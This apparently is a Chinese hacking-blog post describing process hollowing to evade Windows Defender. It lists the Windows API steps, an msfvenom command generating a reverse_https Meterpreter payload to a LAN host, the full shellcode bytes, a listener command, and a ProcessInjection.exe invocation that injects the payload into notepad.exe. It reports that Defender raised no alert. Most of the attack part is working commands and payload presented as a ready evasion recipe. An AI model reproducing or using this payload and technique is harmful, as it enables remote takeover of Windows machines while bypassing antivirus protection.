黑客学徒日记-傀儡进程过winDefender

当你被我控制，你就不再是你了。
—— 鲁迅

原理

参考3gstudent的文章，傀儡进程要做的就是创建一个无害的进程，例如notepad.exe，然后将进程挂起，然后清空内存，然后将shellcode载入内存，最后重启这个挂起的进程。就达到了hollowing(中空，镂空进程）然后注入我们要执行的代码的效果。

1.  通过CreateProcess创建进程，传入参数CREATE_SUSPENDED使进程挂起
2.  通过NtUnmapViewOfSection清空新进程的内存数据
3.  通过VirtualAllocEx申请新的内存
4.  通过WriteProcessMemory向内存写入payload
5.  通过SetThreadContext设置入口点
6.  通过ResumeThread唤醒进程，执行payload

测试

https://3xpl01tc0d3r.blogspot.com/2019/10/process-injection-part-iii.html

监听

handler -H 192.168.0.103 -P 2334 -p windows/x64/meterpreter/reverse_https

生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.0.103 lport=2334 -f c

将msfvenom生成的shellcode保存为c.txt到桌面上

"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x48\x31\xd2\x65\x48\x8b\x52\x60\x56\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x4d\x31\xc9\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x8b\x42\x3c\x41\x51\x48"
"\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x8b\x48"
"\x18\x44\x8b\x40\x20\x50\x49\x01\xd0\xe3\x56\x48\xff\xc9\x4d"
"\x31\xc9\x41\x8b\x34\x88\x48\x01\xd6\x48\x31\xc0\xac\x41\xc1"
"\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
"\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
"\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x48\x31\xdb\x53\x49\xbe\x77\x69\x6e\x69"
"\x6e\x65\x74\x00\x41\x56\x48\x89\xe1\x49\xc7\xc2\x4c\x77\x26"
"\x07\xff\xd5\x53\x53\x48\x89\xe1\x53\x5a\x4d\x31\xc0\x4d\x31"
"\xc9\x53\x53\x49\xba\x3a\x56\x79\xa7\x00\x00\x00\x00\xff\xd5"
"\xe8\x0e\x00\x00\x00\x31\x39\x32\x2e\x31\x36\x38\x2e\x30\x2e"
"\x31\x30\x33\x00\x5a\x48\x89\xc1\x49\xc7\xc0\x1e\x09\x00\x00"
"\x4d\x31\xc9\x53\x53\x6a\x03\x53\x49\xba\x57\x89\x9f\xc6\x00"
"\x00\x00\x00\xff\xd5\xe8\x9c\x00\x00\x00\x2f\x6f\x51\x72\x30"
"\x32\x45\x34\x46\x5a\x5a\x57\x66\x4e\x5a\x34\x33\x5f\x39\x33"
"\x61\x4c\x51\x74\x39\x47\x49\x53\x45\x37\x42\x38\x64\x6b\x67"
"\x65\x7a\x6f\x6f\x35\x61\x71\x4e\x36\x4a\x73\x74\x71\x43\x48"
"\x42\x77\x56\x72\x6a\x61\x78\x39\x53\x56\x38\x30\x73\x56\x33"
"\x47\x75\x39\x50\x71\x67\x5f\x61\x36\x58\x6c\x63\x39\x61\x32"
"\x50\x69\x67\x4f\x32\x53\x61\x78\x71\x45\x4a\x69\x52\x76\x55"
"\x4f\x69\x6d\x50\x4c\x41\x75\x79\x66\x69\x48\x7a\x72\x53\x55"
"\x34\x65\x6b\x54\x6d\x2d\x78\x42\x55\x54\x42\x57\x77\x7a\x55"
"\x57\x69\x63\x65\x54\x32\x38\x46\x38\x5f\x6f\x58\x43\x61\x41"
"\x36\x48\x6a\x2d\x4d\x57\x34\x44\x51\x4a\x6e\x50\x44\x61\x5f"
"\x00\x48\x89\xc1\x53\x5a\x41\x58\x4d\x31\xc9\x53\x48\xb8\x00"
"\x32\xa8\x84\x00\x00\x00\x00\x50\x53\x53\x49\xc7\xc2\xeb\x55"
"\x2e\x3b\xff\xd5\x48\x89\xc6\x6a\x0a\x5f\x48\x89\xf1\x6a\x1f"
"\x5a\x52\x68\x80\x33\x00\x00\x49\x89\xe0\x6a\x04\x41\x59\x49"
"\xba\x75\x46\x9e\x86\x00\x00\x00\x00\xff\xd5\x4d\x31\xc0\x53"
"\x5a\x48\x89\xf1\x4d\x31\xc9\x4d\x31\xc9\x53\x53\x49\xc7\xc2"
"\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1f\x48\xc7\xc1\x88\x13"
"\x00\x00\x49\xba\x44\xf0\x35\xe0\x00\x00\x00\x00\xff\xd5\x48"
"\xff\xcf\x74\x02\xeb\xaa\xe8\x55\x00\x00\x00\x53\x59\x6a\x40"
"\x5a\x49\x89\xd1\xc1\xe2\x10\x49\xc7\xc0\x00\x10\x00\x00\x49"
"\xba\x58\xa4\x53\xe5\x00\x00\x00\x00\xff\xd5\x48\x93\x53\x53"
"\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\x00\x20\x00"
"\x00\x49\x89\xf9\x49\xba\x12\x96\x89\xe2\x00\x00\x00\x00\xff"
"\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb2\x66\x8b\x07\x48\x01\xc3"
"\x85\xc0\x75\xd2\x58\xc3\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5"
"\xa2\x56\xff\xd5"

运行exe

ProcessInjection.exe /ppath:”C:\Windows\System32\notepad.exe” /path:”C:\Users\User\Desktop\c.txt” /f:c /t:3

windows defender无告警

参考资料

evasion

奇安信产品多个漏洞 Previous

黑客学徒日记-动态免杀-过火绒上线 Next